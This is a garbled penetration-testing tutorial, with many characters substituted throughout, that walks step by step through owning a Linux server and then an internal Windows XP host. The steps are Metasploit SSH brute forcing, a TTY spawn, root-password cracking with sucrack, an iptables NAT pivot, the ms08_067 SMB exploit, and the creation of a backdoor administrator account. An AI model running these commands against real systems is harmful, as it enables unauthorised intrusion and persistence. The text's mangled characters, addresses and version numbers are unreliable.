Author: Sumedt Jitpukdebodin Organization: ACIS i-Secure Email ID: materaj@gmail com !

" #log: http:$$r%%t&ec blog&pot com

'enetration (e&ting )inu* +ith brute ,orce (ool

Sometimes I have the job to penetration testing (pentest) the Linux server and mostly harden them. But administrator use the simple(easy) password in the root account or his account and that is the weak point or vulnerability that makes me can get into the internal network and own his system. he !irst penetration testing tool that I think to use is "etasploit #ramework$ the world%s largest &uby project$ it has many many use!ul modules not only exploitation modules. 'ou can sni!!ing$ (oS((enial )! Service)$ crawling$ brute !orcing with this tool. he "etasploit #ramework is the !amous tool in the security world because it%s !ree$ up*to*date and has many developers to create the new modules all the time. hat why I like this tool and when I have the pentest job$ this tool is the !irst thing that comes to my mind. In the last couple days$ I get the new tool to help me get the password o! root account. he name is Sucrack. Sucrack is multithreaded a Linux+,-I. tool !or cracking local user accounts via wordlist brute !orcing su. /!ter I tried it$ I like it because it%s easy to use in any environment$ !ast and that%s it you can get password o! root account with this tool. -ow we%re ready to own the system. "y tools are * * * * Backtrack 0 1-)"2 34 Bit 5ersion "etasploit #ramework 5ersion 6.7.8*dev r96878 Sucrack 5ersion 9.:.6 -map 5ersion 0.09

SCE-A.IO:
/Attacker !achine0 OS: Backtrack 0 1-)"2 34bit 5ersion. !eta&ploit 1er&ion: 6.7.8*dev r968;9 Sucrack 1er&ion: 9.:.6 I' Addre&&: 9;:.937.937.903

/2ir&t 1ictim0 OS: ,buntu 98.98 I' Addre&&: 9;:.937.937.9:; Internal I' Addre&&: 9;:.937.0;.94:

/Second 1ictim3Internal -et+ork40 OS: <indows .= S=: Internal I' Addre&&: 9;:.937.0;.946

Objecti5e: <e don%t have any in!ormation about the network and deeply in!ormation o! the !irst and second victim. <e have only I= /ddress o! !irst and second victims. But our goal%s to get the shell in second victim. "y target is the second victim that it was in internal network. So the !irst thing we must do is own the !irst victim and change it%s to my gateway !or connecting to internal network. /nd !inally$ own the second victim.

Detail O, Step&:
Step 6: #irst thing we must do is per!orm the scanning to !irst victim with -map. "y option o! nmap that we use are >nmap *vv *s5 *)? !or output into the console$ probe the in!o o! service and detect )S.

he results show me about http and ssh service are open. -ow we will use "etasploit to get in there. Step 7: 1o to your "etasploit @onsole with terminal *A ms!console or /pplications "enu*A Bactrack *A 2xploitation ools *A -etwork 2xploitation ools *A "etasploit #ramework *A ms!console

Step 8: In the !irst step$ we !ound the ssh server that open so now we will use sshBlogin module$ auxiliary+scanner+ssh+sshBlogin $ !or brute !orcing ssh server (you can search the module that create !or >ssh? with >search ssh? command.)

'ou can see detail o! this module with >in!o? command.

So we see that the parameter are reCuired by this module are >B&, 2#)&@2BS=22(? >&D)S S? >&=)& ? >S )=B)-BS,@@2SS? > D&2/(S? Speed o! Brute !orcing. arget Dostname or I= /ddress arget =ort that ,se !or SSD =ort Stop brute !orcing a!ter get the credential -umber o! concurrent threads

>52&B)S2?

=rint output to your console

Some parameter was set automatically$ some parameter you must set by yoursel!.

Step 4E -ow we set the >&D)S S?$ >,S2&B#IL2? and >=/SSB#IL2? be!ore start the brute !orcing.

>,S2&B#IL2? >=/SSB#IL2? 2xample o! ,S2&B#IL2

<ordlist that contain username$ one per line. <ordlist that contain password$ one per line.

2xample o! =/SSB#IL2

Step 9: -ow we%re ready to brute !orcing but we will check the options again be!ore start attack with >show options? command.

/!ter check the parameter$ I think we%re ready to go. Start the attack with >run? or >exploit? command.

1o to take a nap or play the game while "etasploit is guessing. Sometimes it may be use the long time and sometimes it may be use the short time depends on strength o! password and your wordlist.

Step :: <hen it get the correct password$ we will see the result like this picture.

his picture show you that username >john? use password >pFssw8rd? and now we get the connection session o! it automatically. he session I( o! the connection session is 9. <e can use =u y or another ssh client to connect the host or use "etasploit to get in there. his tutorial uses "etasploit to get it.

Step ;: -ow we can get in there with >session *i 9? command

<e can check that we%ve already in or not with Linux command. 2x. >ls? and >pwd? command.

But we can%t use >su? command. It will show you Gmust be run !rom a terminal% message command.

Step <: <e can get '(terminal) with two ways.

#irst $ i! 2xpect language installed in system. o @reate getsh.exp with

#!/usr/bin/expect spawn sh interact

2xecute getsh.exp with >expect getsh.exp? command$ /nd <allaHH 'ou get use >su? command.

' and can

Second$ i! =ython language installed in system. o ,se the command to get the command to get the shell ' with >python *c Gimport ptyI pty.spawn(>+bin+sh?)%?

So we%re lucky$ this system has installed python language. /nd I use the second way to get the shell.

Step =: /!ter the last step$ we got the shell and want to get >root? privilege. So we try to use >sudo *s? command but john account is not in the sudoers !ile.

-ow we will use sucrack to brute !orcing in the local system. <e can use with >wget? command to the download link (httpE++labs.portcullis.co.uk+download+sucrack*9.:.6.tar.gJ) and compile it in the victim system(victim system must have gcc compiler) or use >scp? command to take the !ile that compile in the attacker machine to the victim machine. I take the second way because this situation victim machine doesn%t have gcc compiler.

/!ter get the Jip$ extract it with >tar xJv! sucrack*9.:.6.tar.gJ?.

1o to the !older and compile it with .+con!igure @#L/1SK*m6: L make (Set @#L/1SK*m6: to compile !or run in 6:bit because attacker machine%s architecture is 34bit but victim machine%s architecture is 6:bit) /!ter compiling complete$ upload !older to victim system with >scp *r hackerFhackeripE+pentest+exploits+!ramework6+sucrack*9.:.6 .?(run this command in victim system) and upload wordlist !or brute !orcing too.

Step 6%: In victim machine$ go to the sucrack *A src and start brute !orcing with >.+sucrack *w 988 *u root password.txt? command and wait !or the result. I! it !ail it will show message >bye$ byeM?$ i! it success it will show like the below picture.

-ow we have root password(>=FSS<)&(?)$ try to use >su? command to login >root? account. /nd <allaHHH <e own this machine completely.

Step 66: ry to get I= /ddress o! this host.

<e !ound that this machine is like a door !or attacker to get through the internal network. /nd we will use it like a bridge to connect internal network with iptables. <e use >echo 9 A +proc+sys+net+ipv4+ipB!orward? to enable ip !orwarding. <e use >iptables *= #)&</&( /@@2= ? and >iptables **table nat */ =)S &), I-1 *o eth9 *j "/SN,2&/(2? to create the bridge between attacker and internal network.

In the attacker machine$ add routing table !or connect the internal network with >route add *net 9;:.937.0;.8+:4 gw 9;:.937.937.9:;?

-ow we%re connecting to the internal network.

Step 67:

<e%d already know I= /ddress o! second victim is 9;:.937.0;.946. ry to ping it

he second victim is alive. =er!orm scanning with >nmap *v *s5?

<e !ound netbios service (=ort 96;+440) and )S is <indows .= S=: or Sp6 in the results. So I will try to use classic module o! "etasploit to own it.

Step 68: 1o to "etasploit console and use >exploit+windows+smb+ms87B83OBnetapi? module !or remote code exploit o! smb service (96;+440).

'ou can get the in!ormation o! this module with >in!o? command and get the parameter that you must set with >show options? command.

Set &D)S parameter with target address(9;:.937.0;.946).

Step 6>: &un it with >exploit? command.

-ow we got shell o! second victim. 'ou can use >sysin!o? !or view in!ormation o! this victim.

Step 69: Interact cmd shell with >shell? command.

/!ter we%re in the cmd shell$adding the new user to the group o! administrator group !or create backdoor with >net user hacker +add? and >net localgroup administrators hacker +add?.

1ame )ver$ we%re done all jobs in this project.

.e,erence&:
9. "etasploit #rameworkE httpE++www.metasploit.com :. =ost 2xploitation witout 'E httpE++pentestmonkey.net+blog+post*exploitation*without*a* tty+ 6. SucrackE httpE++labs.portcullis.co.uk+application+sucrack+ 4. -mapE httpE++nmap.org+